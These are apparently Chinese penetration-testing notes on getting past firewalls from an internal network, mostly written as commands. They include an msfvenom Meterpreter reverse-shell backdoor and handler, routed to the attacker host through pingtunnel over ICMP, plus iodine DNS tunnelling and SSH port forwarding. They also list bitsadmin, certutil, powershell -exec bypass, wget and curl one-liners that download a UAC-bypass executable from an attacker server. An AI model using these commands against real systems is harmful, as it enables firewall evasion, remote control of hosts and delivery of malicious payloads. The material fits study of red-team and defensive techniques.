隧道技术:
一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装、
传输和解包在内的全过程。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。
封装:
隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。
新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递
传输:
被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。
被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道
解包:
一旦到达网络终点,数据将被解包并转发到最终目的地
解决:
利用各种隧道技术,以网络防火墙允许的协议,
绕过网络防火墙的封锁,实现访问被封锁的目标网络
网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道
ICMP隧道工具:icmpsh pingtunnel icmptunnel
DNS隧道工具:dnscat2 iodine
SSH隧道工具:Linux ssh
IPV6隧道工具:socat 6tunnel nt6tunnel
Socks代理工具:Sockscap Proxifier Proxychains
综合穿透平台:Ngrok Frp SPP Nps(麻烦) EW(停更)
环境:Win主机被防火墙限制出网,只让ICMP协议通讯
解决:实现将Win主机进行CS或MSF控制便于后续安全测试
https://github.com/esrrhs/pingtunnel
判断出网:ping www.baidu.com
Kali生成后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > xd.exe
MSF启动监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
Kali开启隧道:
./pingtunnel -type server
Win开启隧道 //将本地3333 icmp数据转发至158的4444 tcp流量上
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 攻击机IP -t 攻击机IP:4444 -tcp 1
运行生成的xd.exe,把本地127.0.0.1的3333端口的icmp数据转发到攻击机的4444端口的TCP流量上。
环境:内网主机只出网DNS协议数据
解决1:服务器尝试SSH协议连接客户端绕过限制
解决2:上线CS DNS协议
https://github.com/yarrick/iodine
判断出网:nslookup www.baidu.com
服务器:iodined -f -c -P xxxx 192.168.0.1 ns1.xxxxx.com -DD
尝试连接:ssh [email protected]
设置密码xxxx并创建虚拟IP及绑定域名指向
客户端:iodine -f -P xxxx ns1.xxxxx.com
连接密码xxxx并绑定域名指向
环境:内网Kali2021被防火墙拒绝协议连接
开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
防火墙限制:
iptables -A INPUT -p tcp -s 192.168.46.158 -j DROP
本地转发:
kali2021 //将跳板131访问130流量给本地1122端口
ssh -CfNg -L 1122:192.168.46.130:22 [email protected]
ssh [email protected] -p 1122
远程转发://将本地访问130流量转发给158上1234端口
kali2020
ssh -CfNg -R 1234:192.168.46.130:22 [email protected]
kali2021
ssh [email protected] -p 1234
Linux:nc wget curl
windows:ftp vbs powershell certutil bitsadmin
https://blog.csdn.net/qq_36374896/article/details/84350015
vbs:不推荐
ftp:ftp -s:ftp.txt
bitsadmin:bitsadmin /transfer n http://192.168.0.101:8081/DccwBypassUAC.exe c:\DccwBypassUAC.exe
certutil -urlcache -split -f http://192.168.0.101:8081/DccwBypassUAC.exe c:\DccwBypassUAC.exe
powershell -exec bypass -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.101:8081/DccwBypassUAC.exe','c:\DccwBypassUAC.exe')
nc:不推荐
wget http://192.168.0.101:8081/DccwBypassUAC.exe
curl http://192.168.0.101:8081/DccwBypassUAC.exe --output myphp.php
思维导图补充:内网-隧道穿透-ICMP-DNS-SSH-文件传输 - 完全免费的思维导图软件 - 知犀官网知犀官网在线思维导图工具提供:思维导图在线制作,并提供思维导图文件大纲、分享、下载、云存储等实用功能。https://www.zhixi.com/view/9a0884f2